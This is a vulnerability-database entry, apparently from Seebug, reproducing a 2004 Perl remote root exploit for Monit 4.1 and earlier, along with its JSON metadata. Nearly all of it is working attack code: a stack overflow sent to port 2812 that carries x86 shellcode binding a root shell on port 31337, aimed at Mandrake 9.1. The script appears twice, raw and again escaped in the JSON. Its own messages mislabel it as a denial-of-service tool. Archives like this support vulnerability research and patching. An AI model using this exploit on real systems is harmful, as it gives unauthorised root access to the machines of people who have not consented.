ID SSV:62779
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/perl
#
# monit <= 4.1 remote root exploit
# coded by gsicht (09.04.04)
#
use IO::Socket::INET;
$socket = 0;
my $shellcode = # 8 + 88 = 96 bytes portbind 31337
"\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" .
"\x89\xc7\x52\x66\x68" .
"\x7a\x69" . # port 31337/tcp, change if needed
"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" .
"\xb0\x66\xb3\x04\xcd\x80" .
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" .
"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" .
"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";
print "\nmonit 4.1 dos exploit\n";
print "coded by gsicht\n\n";
if(@ARGV<1)
{
print "Usage: perl agate.pl <target>\n\n";
exit(0);
}
print "HOST:\t$ARGV[0]\n";
print "PORT:\t2812\n";
my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; # esp mandrake 9.1
#my $buffer = "A" x 284 . "XXXX" . "B" x 100; #dos and debug
print "connecting to server...\n";
$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],
PeerPort => 2812,
Proto => "tcp");
if(!defined($socket))
{
print "could not connect :-P\n";
sleep(1);
exit(0);
}
print "connected\n";
sleep(1);
print "sending string\n";
print $socket $buffer;
close $socket;
print "\ndosed!\n";
# milw0rm.com [2004-04-09]
{"href": "https://www.seebug.org/vuldb/ssvid-62779", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Monit <= 4.1 - Remote Root Buffer Overflow Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-62779", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n #!/usr/bin/perl\r\n#\r\n# monit <= 4.1 remote root exploit\r\n# coded by gsicht (09.04.04)\r\n#\r\n\r\nuse IO::Socket::INET;\r\n$socket = 0;\r\n\r\nmy $shellcode = # 8 + 88 = 96 bytes portbind 31337\r\n"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90" .\r\n"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90" .\r\n"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80" .\r\n"\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80" .\r\n"\\x89\\xc7\\x52\\x66\\x68" .\r\n"\\x7a\\x69" . # port 31337/tcp, change if needed\r\n"\\x43\\x66\\x53\\x89\\xe1\\xb0\\x10\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80" .\r\n"\\xb0\\x66\\xb3\\x04\\xcd\\x80" .\r\n"\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80" .\r\n"\\x89\\xd9\\x89\\xc3\\xb0\\x3f\\x49\\xcd\\x80" .\r\n"\\x41\\xe2\\xf8\\x51\\x68n/sh\\x68//bi\\x89\\xe3\\x51\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80";\r\n\r\n\r\nprint "\\nmonit 4.1 dos exploit\\n";\r\nprint "coded by gsicht\\n\\n";\r\n\r\nif(@ARGV<1)\r\n{\r\nprint "Usage: perl agate.pl <target>\\n\\n";\r\nexit(0);\r\n}\r\n\r\nprint "HOST:\\t$ARGV[0]\\n";\r\nprint "PORT:\\t2812\\n";\r\n\r\n\r\nmy $buffer = "B" x 284 . "\\xcf\\x89\\xb3\\x40" . $shellcode; # esp mandrake 9.1\r\n#my $buffer = "A" x 284 . "XXXX" . "B" x 100; #dos and debug\r\n\r\nprint "connecting to server...\\n";\r\n\r\n$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],\r\n PeerPort => 2812,\r\n Proto => "tcp");\r\nif(!defined($socket))\r\n{\r\nprint "could not connect :-P\\n";\r\nsleep(1);\r\nexit(0);\r\n}\r\n\r\nprint "connected\\n";\r\nsleep(1);\r\nprint "sending string\\n";\r\nprint $socket $buffer;\r\n\r\nclose $socket;\r\nprint "\\ndosed!\\n";\r\n\r\n# milw0rm.com [2004-04-09]\r\n\n ", "id": "SSV:62779", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:34:17", "reporter": "Root", "enchantments": {"score": {"value": 0.8, "vector": "NONE", "modified": "2017-11-19T14:34:17", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:34:17", "rev": 2}, "vulnersScore": 0.8}, "references": [], "immutableFields": []}
{}